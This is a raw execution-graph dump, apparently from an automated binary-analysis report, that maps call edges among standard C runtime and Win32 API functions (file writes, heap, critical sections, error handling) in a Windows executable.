                                                                                                                                                                                                                                                          execution_graph 5748 bb14bb IsProcessorFeaturePresent 5749 bb14d0 5748->5749 5752 bb1493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5749->5752 5751 bb15b3 5752->5751 5753 bb48bb 5754 bb48cb 5753->5754 5763 bb48e1 5753->5763 5755 bb47f9 _free 15 API calls 5754->5755 5756 bb48d0 5755->5756 5757 bb473d _abort 21 API calls 5756->5757 5759 bb48da 5757->5759 5760 bb494b 5760->5760 5783 bb31ec 5760->5783 5761 bb49b9 5765 bb4869 _free 15 API calls 5761->5765 5763->5760 5766 bb4a2c 5763->5766 5772 bb4a4b 5763->5772 5764 bb49b0 5764->5761 5769 bb4a3e 5764->5769 5789 bb79bb 5764->5789 5765->5766 5798 bb4c65 5766->5798 5770 bb474d _abort 6 API calls 5769->5770 5771 bb4a4a 5770->5771 5773 bb4a57 5772->5773 5773->5773 5774 bb480c __dosmaperr 15 API calls 5773->5774 5775 bb4a85 5774->5775 5776 bb79bb 21 API calls 5775->5776 5777 bb4ab1 5776->5777 5778 bb474d _abort 6 API calls 5777->5778 5779 bb4ae0 _abort 5778->5779 5780 bb4b81 FindFirstFileExA 5779->5780 5781 bb4bd0 5780->5781 5782 bb4a4b 21 API calls 5781->5782 5784 bb31fd 5783->5784 5785 bb3201 5783->5785 5784->5764 5785->5784 5786 bb480c __dosmaperr 15 API calls 5785->5786 5787 bb322f 5786->5787 5788 bb4869 _free 15 API calls 5787->5788 5788->5784 5792 bb790a 5789->5792 5790 bb791f 5791 bb7924 5790->5791 5793 bb47f9 _free 15 API calls 5790->5793 5791->5764 5792->5790 5792->5791 5796 bb795b 5792->5796 5794 bb794a 5793->5794 5795 bb473d _abort 21 API calls 5794->5795 5795->5791 5796->5791 5797 bb47f9 _free 15 API calls 5796->5797 5797->5794 5799 bb4c6f 5798->5799 5800 bb4c7f 5799->5800 5801 bb4869 _free 15 API calls 5799->5801 5802 bb4869 _free 15 API calls 5800->5802 5801->5799 5803 bb4c86 5802->5803 5803->5759 5947 bb12fb 5952 bb1aac SetUnhandledExceptionFilter 5947->5952 5949 bb1300 5953 bb38f9 5949->5953 5951 bb130b 5952->5949 5954 bb391f 5953->5954 5955 bb3905 5953->5955 5954->5951 5955->5954 5956 bb47f9 _free 15 API calls 5955->5956 5957 bb390f 5956->5957 5958 bb473d _abort 21 API calls 5957->5958 5959 bb391a 5958->5959 5959->5951 5804 bb1ab8 5805 bb1aef 5804->5805 5808 bb1aca 5804->5808 5808->5805 5813 bb209a 5808->5813 5825 bb23c3 5813->5825 5816 bb20a3 5817 bb23c3 43 API calls 5816->5817 5818 bb1b06 5817->5818 5819 bb3e89 5818->5819 5820 bb3e95 _abort 5819->5820 5821 bb4424 _abort 33 API calls 5820->5821 5824 bb3e9a 5821->5824 5822 bb3f24 _abort 33 API calls 5823 bb3ec4 5822->5823 5824->5822 5839 bb23d1 5825->5839 5827 bb1afc 5827->5816 5828 bb23c8 5828->5827 5829 bb6b14 _abort 2 API calls 5828->5829 5830 bb3f29 5829->5830 5831 bb3f35 5830->5831 5832 bb6b6f _abort 33 API calls 5830->5832 5833 bb3f5c 5831->5833 5834 bb3f3e IsProcessorFeaturePresent 5831->5834 5832->5831 5835 bb3793 _abort 23 API calls 5833->5835 5836 bb3f49 5834->5836 5837 bb3f66 5835->5837 5838 bb4573 _abort 3 API calls 5836->5838 5838->5833 5840 bb23da 5839->5840 5841 bb23dd GetLastError 5839->5841 5840->5828 5851 bb26a4 5841->5851 5844 bb2411 5845 bb2457 SetLastError 5844->5845 5845->5828 5846 bb26df ___vcrt_FlsSetValue 6 API calls 5847 bb240b 5846->5847 5847->5844 5848 bb2433 5847->5848 5849 bb26df ___vcrt_FlsSetValue 6 API calls 5847->5849 5848->5844 5850 bb26df ___vcrt_FlsSetValue 6 API calls 5848->5850 5849->5848 5850->5844 5852 bb2543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5851->5852 5853 bb26be 5852->5853 5854 bb26d6 TlsGetValue 5853->5854 5855 bb23f2 5853->5855 5854->5855 5855->5844 5855->5845 5855->5846 6126 bb383f 6127 bb384b ___scrt_is_nonwritable_in_current_image 6126->6127 6128 bb3882 _abort 6127->6128 6134 bb56e2 EnterCriticalSection 6127->6134 6130 bb385f 6131 bb67cb __fassign 15 API calls 6130->6131 6132 bb386f 6131->6132 6135 bb3888 6132->6135 6134->6130 6138 bb572a LeaveCriticalSection 6135->6138 6137 bb388f 6137->6128 6138->6137 5960 bb8df1 5961 bb8e15 5960->5961 5962 bb8e2e 5961->5962 5964 bb9beb __startOneArgErrorHandling 5961->5964 5963 bb8e78 5962->5963 5968 bb99d3 5962->5968 5967 bb9c2d __startOneArgErrorHandling 5964->5967 5976 bba1c4 5964->5976 5969 bb99f0 DecodePointer 5968->5969 5971 bb9a00 5968->5971 5969->5971 5970 bb9a82 _ValidateLocalCookies 5970->5963 5971->5970 5972 bb9a8d 5971->5972 5973 bb9a37 5971->5973 5972->5970 5974 bb47f9 _free 15 API calls 5972->5974 5973->5970 5975 bb47f9 _free 15 API calls 5973->5975 5974->5970 5975->5970 5977 bba1fd __startOneArgErrorHandling 5976->5977 5979 bba224 __startOneArgErrorHandling 5977->5979 5985 bba495 5977->5985 5980 bba267 5979->5980 5981 bba242 5979->5981 5996 bba786 5980->5996 5989 bba7b5 5981->5989 5983 bba262 __startOneArgErrorHandling _ValidateLocalCookies 5983->5967 5986 bba4c0 __raise_exc 5985->5986 5987 bba6b9 RaiseException 5986->5987 5988 bba6d1 5987->5988 5988->5979 5990 bba7c4 5989->5990 5991 bba838 __startOneArgErrorHandling 5990->5991 5992 bba7e3 __startOneArgErrorHandling 5990->5992 5993 bba786 __startOneArgErrorHandling 15 API calls 5991->5993 5994 bba786 __startOneArgErrorHandling 15 API calls 5992->5994 5995 bba831 5992->5995 5993->5995 5994->5995 5995->5983 5997 bba7a8 5996->5997 5998 bba793 5996->5998 5999 bb47f9 _free 15 API calls 5997->5999 6000 bba7ad 5998->6000 6001 bb47f9 _free 15 API calls 5998->6001 5999->6000 6000->5983 6002 bba7a0 6001->6002 6002->5983 6590 bb7570 6591 bb75a9 6590->6591 6592 bb47f9 _free 15 API calls 6591->6592 6596 bb75d5 _ValidateLocalCookies 6591->6596 6593 bb75b2 6592->6593 6594 bb473d _abort 21 API calls 6593->6594 6595 bb75bd _ValidateLocalCookies 6594->6595 5856 bb3eb5 5857 bb3eb8 5856->5857 5858 bb3f24 _abort 33 API calls 5857->5858 5859 bb3ec4 5858->5859 6003 bb1ff4 6006 bb2042 6003->6006 6007 bb1fff 6006->6007 6008 bb204b 6006->6008 6008->6007 6009 bb23c3 43 API calls 6008->6009 6010 bb2086 6009->6010 6011 bb23c3 43 API calls 6010->6011 6012 bb2091 6011->6012 6013 bb3e89 33 API calls 6012->6013 6014 bb2099 6013->6014 6015 bb9beb 6016 bb9c04 __startOneArgErrorHandling 6015->6016 6017 bba1c4 16 API calls 6016->6017 6018 bb9c2d __startOneArgErrorHandling 6016->6018 6017->6018 6139 bb142e 6142 bb2cf0 6139->6142 6141 bb143f 6143 bb44a8 __dosmaperr 15 API calls 6142->6143 6144 bb2d07 _ValidateLocalCookies 6143->6144 6144->6141 6145 bb452d 6153 bb5858 6145->6153 6147 bb4537 6148 bb4541 6147->6148 6149 bb44a8 __dosmaperr 15 API calls 6147->6149 6150 bb4549 6149->6150 6151 bb4556 6150->6151 6158 bb4559 6150->6158 6154 bb5741 __dosmaperr 5 API calls 6153->6154 6155 bb587f 6154->6155 6156 bb5897 TlsAlloc 6155->6156 6157 bb5888 _ValidateLocalCookies 6155->6157 6156->6157 6157->6147 6159 bb4563 6158->6159 6160 bb4569 6158->6160 6162 bb58ae 6159->6162 6160->6148 6163 bb5741 __dosmaperr 5 API calls 6162->6163 6164 bb58d5 6163->6164 6165 bb58ed TlsFree 6164->6165 6166 bb58e1 _ValidateLocalCookies 6164->6166 6165->6166 6166->6160 5860 bb56a1 5861 bb56ac 5860->5861 5863 bb56d5 5861->5863 5864 bb56d1 5861->5864 5866 bb59b3 5861->5866 5871 bb56f9 5863->5871 5867 bb5741 __dosmaperr 5 API calls 5866->5867 5868 bb59da 5867->5868 5869 bb59f8 InitializeCriticalSectionAndSpinCount 5868->5869 5870 bb59e3 _ValidateLocalCookies 5868->5870 5869->5870 5870->5861 5872 bb5725 5871->5872 5873 bb5706 5871->5873 5872->5864 5874 bb5710 DeleteCriticalSection 5873->5874 5874->5872 5874->5874 6019 bb8ce1 6020 bb8d01 6019->6020 6023 bb8d38 6020->6023 6022 bb8d2b 6025 bb8d3f 6023->6025 6024 bb8d5f 6027 bb988e 6024->6027 6030 bb9997 16 API calls 6024->6030 6025->6024 6026 bb8da0 6025->6026 6026->6027 6032 bb9997 6026->6032 6027->6022 6031 bb98be 6030->6031 6031->6022 6033 bb99a0 6032->6033 6036 bba06f 6033->6036 6035 bb8dee 6035->6022 6037 bba0ae __startOneArgErrorHandling 6036->6037 6040 bba130 __startOneArgErrorHandling 6037->6040 6042 bba472 6037->6042 6039 bba786 __startOneArgErrorHandling 15 API calls 6041 bba166 _ValidateLocalCookies 6039->6041 6040->6039 6040->6041 6041->6035 6043 bba495 __raise_exc RaiseException 6042->6043 6044 bba490 6043->6044 6044->6040 6597 bb9160 6600 bb917e 6597->6600 6599 bb9176 6601 bb9183 6600->6601 6602 bb9218 6601->6602 6603 bb99d3 16 API calls 6601->6603 6602->6599 6604 bb93af 6603->6604 6604->6599 5875 bb5ba6 5876 bb5bd7 5875->5876 5877 bb5bb1 5875->5877 5877->5876 5878 bb5bc1 FreeLibrary 5877->5878 5878->5877 6167 bb6026 6170 bb602b 6167->6170 6168 bb604e 6170->6168 6171 bb5c56 6170->6171 6172 bb5c63 6171->6172 6176 bb5c85 6171->6176 6173 bb5c7f 6172->6173 6174 bb5c71 DeleteCriticalSection 6172->6174 6175 bb4869 _free 15 API calls 6173->6175 6174->6173 6174->6174 6175->6176 6176->6170 6045 bb33e5 6046 bb33fd 6045->6046 6047 bb33f7 6045->6047 6049 bb3376 6047->6049 6050 bb3383 6049->6050 6054 bb33a0 6049->6054 6051 bb339a 6050->6051 6052 bb4869 _free 15 API calls 6050->6052 6053 bb4869 _free 15 API calls 6051->6053 6052->6050 6053->6054 6054->6046 6177 bb7419 6187 bb7fb2 6177->6187 6181 bb7426 6200 bb828e 6181->6200 6184 bb7450 6185 bb4869 _free 15 API calls 6184->6185 6186 bb745b 6185->6186 6204 bb7fbb 6187->6204 6189 bb7421 6190 bb81ee 6189->6190 6191 bb81fa ___scrt_is_nonwritable_in_current_image 6190->6191 6224 bb56e2 EnterCriticalSection 6191->6224 6193 bb8270 6238 bb8285 6193->6238 6195 bb8244 DeleteCriticalSection 6198 bb4869 _free 15 API calls 6195->6198 6196 bb827c _abort 6196->6181 6199 bb8205 6198->6199 6199->6193 6199->6195 6225 bb901c 6199->6225 6201 bb7435 DeleteCriticalSection 6200->6201 6202 bb82a4 6200->6202 6201->6181 6201->6184 6202->6201 6203 bb4869 _free 15 API calls 6202->6203 6203->6201 6205 bb7fc7 ___scrt_is_nonwritable_in_current_image 6204->6205 6214 bb56e2 EnterCriticalSection 6205->6214 6207 bb806a 6219 bb808a 6207->6219 6210 bb8076 _abort 6210->6189 6212 bb7fd6 6212->6207 6213 bb7f6b 61 API calls 6212->6213 6215 bb7465 EnterCriticalSection 6212->6215 6216 bb8060 6212->6216 6213->6212 6214->6212 6215->6212 6222 bb7479 LeaveCriticalSection 6216->6222 6218 bb8068 6218->6212 6223 bb572a LeaveCriticalSection 6219->6223 6221 bb8091 6221->6210 6222->6218 6223->6221 6224->6199 6226 bb9028 ___scrt_is_nonwritable_in_current_image 6225->6226 6227 bb9039 6226->6227 6228 bb904e 6226->6228 6229 bb47f9 _free 15 API calls 6227->6229 6237 bb9049 _abort 6228->6237 6241 bb7465 EnterCriticalSection 6228->6241 6231 bb903e 6229->6231 6233 bb473d _abort 21 API calls 6231->6233 6232 bb906a 6242 bb8fa6 6232->6242 6233->6237 6235 bb9075 6258 bb9092 6235->6258 6237->6199 6496 bb572a LeaveCriticalSection 6238->6496 6240 bb828c 6240->6196 6241->6232 6243 bb8fb3 6242->6243 6245 bb8fc8 6242->6245 6244 bb47f9 _free 15 API calls 6243->6244 6246 bb8fb8 6244->6246 6250 bb8fc3 6245->6250 6261 bb7f05 6245->6261 6248 bb473d _abort 21 API calls 6246->6248 6248->6250 6250->6235 6251 bb828e 15 API calls 6252 bb8fe4 6251->6252 6267 bb732b 6252->6267 6254 bb8fea 6274 bb9d4e 6254->6274 6257 bb4869 _free 15 API calls 6257->6250 6495 bb7479 LeaveCriticalSection 6258->6495 6260 bb909a 6260->6237 6262 bb7f1d 6261->6262 6266 bb7f19 6261->6266 6263 bb732b 21 API calls 6262->6263 6262->6266 6264 bb7f3d 6263->6264 6289 bb89a7 6264->6289 6266->6251 6268 bb734c 6267->6268 6269 bb7337 6267->6269 6268->6254 6270 bb47f9 _free 15 API calls 6269->6270 6271 bb733c 6270->6271 6272 bb473d _abort 21 API calls 6271->6272 6273 bb7347 6272->6273 6273->6254 6275 bb9d5d 6274->6275 6276 bb9d72 6274->6276 6277 bb47e6 __dosmaperr 15 API calls 6275->6277 6278 bb9dad 6276->6278 6282 bb9d99 6276->6282 6279 bb9d62 6277->6279 6280 bb47e6 __dosmaperr 15 API calls 6278->6280 6281 bb47f9 _free 15 API calls 6279->6281 6283 bb9db2 6280->6283 6286 bb8ff0 6281->6286 6452 bb9d26 6282->6452 6285 bb47f9 _free 15 API calls 6283->6285 6287 bb9dba 6285->6287 6286->6250 6286->6257 6288 bb473d _abort 21 API calls 6287->6288 6288->6286 6290 bb89b3 ___scrt_is_nonwritable_in_current_image 6289->6290 6291 bb89bb 6290->6291 6292 bb89d3 6290->6292 6314 bb47e6 6291->6314 6293 bb8a71 6292->6293 6297 bb8a08 6292->6297 6295 bb47e6 __dosmaperr 15 API calls 6293->6295 6298 bb8a76 6295->6298 6317 bb5d23 EnterCriticalSection 6297->6317 6301 bb47f9 _free 15 API calls 6298->6301 6299 bb47f9 _free 15 API calls 6307 bb89c8 _abort 6299->6307 6303 bb8a7e 6301->6303 6302 bb8a0e 6304 bb8a2a 6302->6304 6305 bb8a3f 6302->6305 6306 bb473d _abort 21 API calls 6303->6306 6308 bb47f9 _free 15 API calls 6304->6308 6318 bb8a92 6305->6318 6306->6307 6307->6266 6310 bb8a2f 6308->6310 6312 bb47e6 __dosmaperr 15 API calls 6310->6312 6311 bb8a3a 6367 bb8a69 6311->6367 6312->6311 6315 bb44a8 __dosmaperr 15 API calls 6314->6315 6316 bb47eb 6315->6316 6316->6299 6317->6302 6319 bb8ac0 6318->6319 6348 bb8ab9 _ValidateLocalCookies 6318->6348 6320 bb8ae3 6319->6320 6321 bb8ac4 6319->6321 6323 bb8b34 6320->6323 6324 bb8b17 6320->6324 6322 bb47e6 __dosmaperr 15 API calls 6321->6322 6325 bb8ac9 6322->6325 6327 bb8b4a 6323->6327 6370 bb8f8b 6323->6370 6326 bb47e6 __dosmaperr 15 API calls 6324->6326 6328 bb47f9 _free 15 API calls 6325->6328 6332 bb8b1c 6326->6332 6373 bb8637 6327->6373 6330 bb8ad0 6328->6330 6333 bb473d _abort 21 API calls 6330->6333 6335 bb47f9 _free 15 API calls 6332->6335 6333->6348 6338 bb8b24 6335->6338 6336 bb8b58 6339 bb8b7e 6336->6339 6340 bb8b5c 6336->6340 6337 bb8b91 6342 bb8beb WriteFile 6337->6342 6343 bb8ba5 6337->6343 6341 bb473d _abort 21 API calls 6338->6341 6385 bb8417 GetConsoleCP 6339->6385 6346 bb8c52 6340->6346 6380 bb85ca 6340->6380 6341->6348 6349 bb8c0e GetLastError 6342->6349 6354 bb8b74 6342->6354 6344 bb8bdb 6343->6344 6345 bb8bad 6343->6345 6405 bb86ad 6344->6405 6350 bb8bcb 6345->6350 6351 bb8bb2 6345->6351 6346->6348 6356 bb47f9 _free 15 API calls 6346->6356 6348->6311 6349->6354 6399 bb887a 6350->6399 6351->6346 6394 bb878c 6351->6394 6354->6346 6354->6348 6357 bb8c2e 6354->6357 6359 bb8c77 6356->6359 6361 bb8c49 6357->6361 6362 bb8c35 6357->6362 6360 bb47e6 __dosmaperr 15 API calls 6359->6360 6360->6348 6410 bb47c3 6361->6410 6363 bb47f9 _free 15 API calls 6362->6363 6365 bb8c3a 6363->6365 6366 bb47e6 __dosmaperr 15 API calls 6365->6366 6366->6348 6451 bb5d46 LeaveCriticalSection 6367->6451 6369 bb8a6f 6369->6307 6415 bb8f0d 6370->6415 6437 bb7eaf 6373->6437 6375 bb8647 6376 bb864c 6375->6376 6377 bb4424 _abort 33 API calls 6375->6377 6376->6336 6376->6337 6378 bb866f 6377->6378 6378->6376 6379 bb868d GetConsoleMode 6378->6379 6379->6376 6381 bb8624 6380->6381 6384 bb85ef 6380->6384 6381->6354 6382 bb9101 WriteConsoleW CreateFileW 6382->6384 6383 bb8626 GetLastError 6383->6381 6384->6381 6384->6382 6384->6383 6386 bb858c _ValidateLocalCookies 6385->6386 6388 bb847a 6385->6388 6386->6354 6388->6386 6389 bb8500 WideCharToMultiByte 6388->6389 6391 bb72b7 35 API calls __fassign 6388->6391 6393 bb8557 WriteFile 6388->6393 6446 bb6052 6388->6446 6389->6386 6390 bb8526 WriteFile 6389->6390 6390->6388 6392 bb85af GetLastError 6390->6392 6391->6388 6392->6386 6393->6388 6393->6392 6396 bb879b 6394->6396 6395 bb8819 WriteFile 6395->6396 6397 bb885f GetLastError 6395->6397 6396->6395 6398 bb885d _ValidateLocalCookies 6396->6398 6397->6398 6398->6354 6404 bb8889 6399->6404 6400 bb8994 _ValidateLocalCookies 6400->6354 6401 bb890b WideCharToMultiByte 6402 bb898c GetLastError 6401->6402 6403 bb8940 WriteFile 6401->6403 6402->6400 6403->6402 6403->6404 6404->6400 6404->6401 6404->6403 6407 bb86bc 6405->6407 6406 bb872e WriteFile 6406->6407 6408 bb8771 GetLastError 6406->6408 6407->6406 6409 bb876f _ValidateLocalCookies 6407->6409 6408->6409 6409->6354 6411 bb47e6 __dosmaperr 15 API calls 6410->6411 6412 bb47ce _free 6411->6412 6413 bb47f9 _free 15 API calls 6412->6413 6414 bb47e1 6413->6414 6414->6348 6424 bb5dfa 6415->6424 6417 bb8f1f 6418 bb8f38 SetFilePointerEx 6417->6418 6419 bb8f27 6417->6419 6421 bb8f2c 6418->6421 6422 bb8f50 GetLastError 6418->6422 6420 bb47f9 _free 15 API calls 6419->6420 6420->6421 6421->6327 6423 bb47c3 __dosmaperr 15 API calls 6422->6423 6423->6421 6425 bb5e07 6424->6425 6427 bb5e1c 6424->6427 6426 bb47e6 __dosmaperr 15 API calls 6425->6426 6429 bb5e0c 6426->6429 6428 bb47e6 __dosmaperr 15 API calls 6427->6428 6430 bb5e41 6427->6430 6431 bb5e4c 6428->6431 6432 bb47f9 _free 15 API calls 6429->6432 6430->6417 6434 bb47f9 _free 15 API calls 6431->6434 6433 bb5e14 6432->6433 6433->6417 6435 bb5e54 6434->6435 6436 bb473d _abort 21 API calls 6435->6436 6436->6433 6438 bb7ec9 6437->6438 6439 bb7ebc 6437->6439 6442 bb7ed5 6438->6442 6443 bb47f9 _free 15 API calls 6438->6443 6440 bb47f9 _free 15 API calls 6439->6440 6441 bb7ec1 6440->6441 6441->6375 6442->6375 6444 bb7ef6 6443->6444 6445 bb473d _abort 21 API calls 6444->6445 6445->6441 6447 bb4424 _abort 33 API calls 6446->6447 6448 bb605d 6447->6448 6449 bb72d1 __fassign 33 API calls 6448->6449 6450 bb606d 6449->6450 6450->6388 6451->6369 6455 bb9ca4 6452->6455 6454 bb9d4a 6454->6286 6456 bb9cb0 ___scrt_is_nonwritable_in_current_image 6455->6456 6466 bb5d23 EnterCriticalSection 6456->6466 6458 bb9cbe 6459 bb9cf0 6458->6459 6460 bb9ce5 6458->6460 6462 bb47f9 _free 15 API calls 6459->6462 6467 bb9dcd 6460->6467 6463 bb9ceb 6462->6463 6482 bb9d1a 6463->6482 6465 bb9d0d _abort 6465->6454 6466->6458 6468 bb5dfa 21 API calls 6467->6468 6470 bb9ddd 6468->6470 6469 bb9de3 6485 bb5d69 6469->6485 6470->6469 6473 bb5dfa 21 API calls 6470->6473 6481 bb9e15 6470->6481 6475 bb9e0c 6473->6475 6474 bb5dfa 21 API calls 6476 bb9e21 CloseHandle 6474->6476 6479 bb5dfa 21 API calls 6475->6479 6476->6469 6480 bb9e2d GetLastError 6476->6480 6477 bb47c3 __dosmaperr 15 API calls 6478 bb9e5d 6477->6478 6478->6463 6479->6481 6480->6469 6481->6469 6481->6474 6494 bb5d46 LeaveCriticalSection 6482->6494 6484 bb9d24 6484->6465 6486 bb5d78 6485->6486 6487 bb5ddf 6485->6487 6486->6487 6493 bb5da2 6486->6493 6488 bb47f9 _free 15 API calls 6487->6488 6489 bb5de4 6488->6489 6490 bb47e6 __dosmaperr 15 API calls 6489->6490 6491 bb5dcf 6490->6491 6491->6477 6491->6478 6492 bb5dc9 SetStdHandle 6492->6491 6493->6491 6493->6492 6494->6484 6495->6260 6496->6240 6605 bb365d 6606 bb3e89 33 API calls 6605->6606 6607 bb3665 6606->6607 6497 bb7d1c 6498 bb522b 46 API calls 6497->6498 6499 bb7d21 6498->6499 5879 bb6893 GetProcessHeap 6608 bb2f53 6609 bb2f7e 6608->6609 6610 bb2f62 6608->6610 6612 bb522b 46 API calls 6609->6612 6610->6609 6611 bb2f68 6610->6611 6613 bb47f9 _free 15 API calls 6611->6613 6614 bb2f85 GetModuleFileNameA 6612->6614 6615 bb2f6d 6613->6615 6616 bb2fa9 6614->6616 6617 bb473d _abort 21 API calls 6615->6617 6631 bb3077 6616->6631 6618 bb2f77 6617->6618 6621 bb31ec 15 API calls 6622 bb2fd3 6621->6622 6623 bb2fe8 6622->6623 6624 bb2fdc 6622->6624 6626 bb3077 33 API calls 6623->6626 6625 bb47f9 _free 15 API calls 6624->6625 6630 bb2fe1 6625->6630 6628 bb2ffe 6626->6628 6627 bb4869 _free 15 API calls 6627->6618 6629 bb4869 _free 15 API calls 6628->6629 6628->6630 6629->6630 6630->6627 6633 bb309c 6631->6633 6632 bb55b6 33 API calls 6632->6633 6633->6632 6635 bb30fc 6633->6635 6634 bb2fc6 6634->6621 6635->6634 6636 bb55b6 33 API calls 6635->6636 6636->6635 6637 bb7351 6638 bb735e 6637->6638 6639 bb480c __dosmaperr 15 API calls 6638->6639 6640 bb7378 6639->6640 6641 bb4869 _free 15 API calls 6640->6641 6642 bb7384 6641->6642 6643 bb480c __dosmaperr 15 API calls 6642->6643 6647 bb73aa 6642->6647 6644 bb739e 6643->6644 6646 bb4869 _free 15 API calls 6644->6646 6645 bb59b3 6 API calls 6645->6647 6646->6647 6647->6645 6648 bb73b6 6647->6648 6055 bb5fd0 6056 bb5fdc ___scrt_is_nonwritable_in_current_image 6055->6056 6067 bb56e2 EnterCriticalSection 6056->6067 6058 bb5fe3 6068 bb5c8b 6058->6068 6060 bb5ff2 6066 bb6001 6060->6066 6081 bb5e64 GetStartupInfoW 6060->6081 6065 bb6012 _abort 6092 bb601d 6066->6092 6067->6058 6069 bb5c97 ___scrt_is_nonwritable_in_current_image 6068->6069 6070 bb5cbb 6069->6070 6071 bb5ca4 6069->6071 6095 bb56e2 EnterCriticalSection 6070->6095 6072 bb47f9 _free 15 API calls 6071->6072 6074 bb5ca9 6072->6074 6075 bb473d _abort 21 API calls 6074->6075 6076 bb5cb3 _abort 6075->6076 6076->6060 6077 bb5cf3 6103 bb5d1a 6077->6103 6079 bb5cc7 6079->6077 6096 bb5bdc 6079->6096 6082 bb5e81 6081->6082 6083 bb5f13 6081->6083 6082->6083 6084 bb5c8b 22 API calls 6082->6084 6087 bb5f1a 6083->6087 6085 bb5eaa 6084->6085 6085->6083 6086 bb5ed8 GetFileType 6085->6086 6086->6085 6088 bb5f21 6087->6088 6089 bb5f64 GetStdHandle 6088->6089 6090 bb5fcc 6088->6090 6091 bb5f77 GetFileType 6088->6091 6089->6088 6090->6066 6091->6088 6107 bb572a LeaveCriticalSection 6092->6107 6094 bb6024 6094->6065 6095->6079 6097 bb480c __dosmaperr 15 API calls 6096->6097 6099 bb5bee 6097->6099 6098 bb5bfb 6100 bb4869 _free 15 API calls 6098->6100 6099->6098 6101 bb59b3 6 API calls 6099->6101 6102 bb5c4d 6100->6102 6101->6099 6102->6079 6106 bb572a LeaveCriticalSection 6103->6106 6105 bb5d21 6105->6076 6106->6105 6107->6094 6500 bb7a10 6503 bb7a27 6500->6503 6504 bb7a49 6503->6504 6505 bb7a35 6503->6505 6507 bb7a63 6504->6507 6508 bb7a51 6504->6508 6506 bb47f9 _free 15 API calls 6505->6506 6509 bb7a3a 6506->6509 6511 bb3f72 __fassign 33 API calls 6507->6511 6515 bb7a22 6507->6515 6510 bb47f9 _free 15 API calls 6508->6510 6512 bb473d _abort 21 API calls 6509->6512 6513 bb7a56 6510->6513 6511->6515 6512->6515 6514 bb473d _abort 21 API calls 6513->6514 6514->6515 5880 bb4c8a 5885 bb4cbf 5880->5885 5883 bb4ca6 5884 bb4869 _free 15 API calls 5884->5883 5886 bb4cd1 5885->5886 5887 bb4c98 5885->5887 5888 bb4d01 5886->5888 5889 bb4cd6 5886->5889 5887->5883 5887->5884 5888->5887 5896 bb681b 5888->5896 5890 bb480c __dosmaperr 15 API calls 5889->5890 5891 bb4cdf 5890->5891 5893 bb4869 _free 15 API calls 5891->5893 5893->5887 5894 bb4d1c 5895 bb4869 _free 15 API calls 5894->5895 5895->5887 5897 bb6826 5896->5897 5898 bb684e 5897->5898 5899 bb683f 5897->5899 5900 bb685d 5898->5900 5905 bb7e13 5898->5905 5901 bb47f9 _free 15 API calls 5899->5901 5912 bb7e46 5900->5912 5904 bb6844 _abort 5901->5904 5904->5894 5906 bb7e1e 5905->5906 5907 bb7e33 HeapSize 5905->5907 5908 bb47f9 _free 15 API calls 5906->5908 5907->5900 5909 bb7e23 5908->5909 5910 bb473d _abort 21 API calls 5909->5910 5911 bb7e2e 5910->5911 5911->5900 5913 bb7e5e 5912->5913 5914 bb7e53 5912->5914 5916 bb7e66 5913->5916 5922 bb7e6f __dosmaperr 5913->5922 5915 bb62ff 16 API calls 5914->5915 5921 bb7e5b 5915->5921 5919 bb4869 _free 15 API calls 5916->5919 5917 bb7e99 HeapReAlloc 5917->5921 5917->5922 5918 bb7e74 5920 bb47f9 _free 15 API calls 5918->5920 5919->5921 5920->5921 5921->5904 5922->5917 5922->5918 5923 bb6992 __dosmaperr 2 API calls 5922->5923 5923->5922 5924 bb1489 5927 bb1853 5924->5927 5926 bb148e 5926->5926 5928 bb1869 5927->5928 5930 bb1872 5928->5930 5931 bb1806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5928->5931 5930->5926 5931->5930 6649 bb1248 6650 bb1250 6649->6650 6666 bb37f7 6650->6666 6652 bb125b 6673 bb1664 6652->6673 6654 bb12cd 6655 bb191f 4 API calls 6654->6655 6665 bb12ea 6654->6665 6656 bb12f2 6655->6656 6657 bb1270 __RTC_Initialize 6657->6654 6679 bb17f1 6657->6679 6659 bb1289 6659->6654 6682 bb18ab InitializeSListHead 6659->6682 6661 bb129f 6683 bb18ba 6661->6683 6663 bb12c2 6689 bb3891 6663->6689 6667 bb3829 6666->6667 6668 bb3806 6666->6668 6667->6652 6668->6667 6669 bb47f9 _free 15 API calls 6668->6669 6670 bb3819 6669->6670 6671 bb473d _abort 21 API calls 6670->6671 6672 bb3824 6671->6672 6672->6652 6674 bb1670 6673->6674 6675 bb1674 6673->6675 6674->6657 6676 bb1681 ___scrt_release_startup_lock 6675->6676 6677 bb191f 4 API calls 6675->6677 6676->6657 6678 bb16ea 6677->6678 6696 bb17c4 6679->6696 6682->6661 6734 bb3e2a 6683->6734 6685 bb18cb 6686 bb18d2 6685->6686 6687 bb191f 4 API calls 6685->6687 6686->6663 6688 bb18da 6687->6688 6688->6663 6690 bb4424 _abort 33 API calls 6689->6690 6691 bb389c 6690->6691 6692 bb38d4 6691->6692 6693 bb47f9 _free 15 API calls 6691->6693 6692->6654 6694 bb38c9 6693->6694 6695 bb473d _abort 21 API calls 6694->6695 6695->6692 6697 bb17da 6696->6697 6698 bb17d3 6696->6698 6705 bb3cf1 6697->6705 6702 bb3c81 6698->6702 6701 bb17d8 6701->6659 6703 bb3cf1 24 API calls 6702->6703 6704 bb3c93 6703->6704 6704->6701 6708 bb39f8 6705->6708 6711 bb392e 6708->6711 6710 bb3a1c 6710->6701 6712 bb393a ___scrt_is_nonwritable_in_current_image 6711->6712 6719 bb56e2 EnterCriticalSection 6712->6719 6714 bb3948 6720 bb3b40 6714->6720 6716 bb3955 6730 bb3973 6716->6730 6718 bb3966 _abort 6718->6710 6719->6714 6721 bb3b56 __dosmaperr 6720->6721 6722 bb3b5e 6720->6722 6721->6716 6722->6721 6723 bb3bb7 6722->6723 6725 bb681b 24 API calls 6722->6725 6723->6721 6724 bb681b 24 API calls 6723->6724 6727 bb3bcd 6724->6727 6726 bb3bad 6725->6726 6728 bb4869 _free 15 API calls 6726->6728 6729 bb4869 _free 15 API calls 6727->6729 6728->6723 6729->6721 6733 bb572a LeaveCriticalSection 6730->6733 6732 bb397d 6732->6718 6733->6732 6735 bb3e48 6734->6735 6739 bb3e68 6734->6739 6736 bb47f9 _free 15 API calls 6735->6736 6737 bb3e5e 6736->6737 6738 bb473d _abort 21 API calls 6737->6738 6738->6739 6739->6685 5932 bb3d8f 5933 bb3d9e 5932->5933 5937 bb3db2 5932->5937 5935 bb4869 _free 15 API calls 5933->5935 5933->5937 